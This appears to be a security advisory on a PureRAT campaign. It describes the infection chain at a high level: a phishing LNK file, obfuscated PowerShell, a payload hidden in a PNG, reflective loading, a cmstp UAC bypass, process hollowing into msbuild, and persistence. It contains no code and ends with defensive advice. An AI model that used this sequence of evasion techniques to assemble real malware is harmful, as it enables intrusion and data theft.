A recently identified campaign leveraging PureRAT demonstrates a significant evolution in cyber threats through the combined use of steganography and fileless execution techniques. The attack begins with a deceptive LNK shortcut that triggers an obfuscated PowerShell script, which downloads a seemingly benign PNG image containing a hidden Base64-encoded payload.
This payload is extracted and executed entirely in memory using legitimate Windows utilities such as cmstp.exe and msbuild.exe, allowing the malware to bypass traditional defences and blend into normal system activity. The campaign incorporates advanced techniques, including sandbox detection, process hollowing, and encrypted multi-stage loaders to establish persistent access and enable data theft or further compromise.
The PureRAT campaign follows a multi-stage, fileless infection chain initiated by a malicious LNK file that executes an obfuscated PowerShell command. This script retrieves a PNG image from a remote server, which contains a Base64-encoded payload hidden using steganography.
The script programmatically extracts and transforms the encoded data through character replacement and reversal before decoding it into a byte array. This payload is then reflectively loaded into memory using .NET’s Assembly.Load(), eliminating the need for disk-based artifacts.
The loaded assembly acts as a loader that decrypts subsequent payloads using Triple DES encryption with embedded keys and initialization vectors. Execution continues entirely in memory, incorporating sandbox evasion checks such as virtualization detection, UAC bypass via cmstp.exe, and process hollowing into msbuild.exe to appear as a legitimate process.
The final stage establishes command-and-control communication and ensures persistence through scheduled tasks, enabling long-term remote access without leaving conventional file traces. The details and technicalities of the attack campaign are discussed further,
Delivery and Infection Chain:
The attack is initiated through a malicious Windows shortcut file that is typically delivered via phishing or disguised as a legitimate file. Upon execution, the shortcut silently runs a hidden PowerShell command that retrieves a remote payload embedded within an image file.
Technical Capabilities:
PureRAT demonstrates highly advanced fileless execution capabilities designed to evade traditional detection mechanisms. It leverages PowerShell for execution and steganography to conceal malicious payloads within benign image files, which are then decoded and loaded directly into memory.
The malware employs layered obfuscation techniques, encrypted payload stages, and sandbox evasion mechanisms to avoid both static and behavioral analysis. It bypasses User Account Control using legitimate Windows utilities and injects code into trusted processes to maintain stealth.
Once active, PureRAT performs system reconnaissance, establishes persistent communication with command-and-control infrastructure, and enables modular deployment of additional capabilities such as keylogging, remote access, and continuous monitoring.
Attribution and Evolution:
While definitive attribution remains unconfirmed, the techniques observed in this campaign align with modern financially motivated or espionage-driven threat actors. The use of steganography, in-memory execution, and layered obfuscation reflects a broader shift from traditional file-based malware to stealthy, memory-resident threats.
This campaign highlights an ongoing evolution in attacker methodologies focused on evasion, persistence, and reduced forensic visibility.
Active Campaign and Geographic Spread:
The campaign appears opportunistic in nature, leveraging phishing and generic delivery mechanisms to achieve widespread distribution across industries. The use of common file formats and remote infrastructure allows it to scale globally without targeting a specific region.
Dynamic command-and-control mechanisms enable attackers to adapt operations and shift targets as needed, increasing the overall attack surface.
Conclusion:
The PureRAT campaign underscores the growing prevalence of fileless malware that leverages trusted system utilities and benign file formats to evade detection. The combination of steganography, in-memory execution, and multi-stage payload delivery challenges traditional security approaches.
Organizations must move beyond signature-based defenses and adopt behavioral detection, enhanced monitoring of scripting environments, and stricter control over trusted binaries to effectively mitigate such threats.
A successful PureRAT infection provides attackers with persistent remote access to compromised systems, enabling data exfiltration, credential theft, surveillance, and lateral movement within networks.
The fileless nature of the attack complicates detection and forensic investigation, increasing dwell time and amplifying potential damage. This can result in operational disruption, data breaches, financial loss, and reputational impact if not identified early.
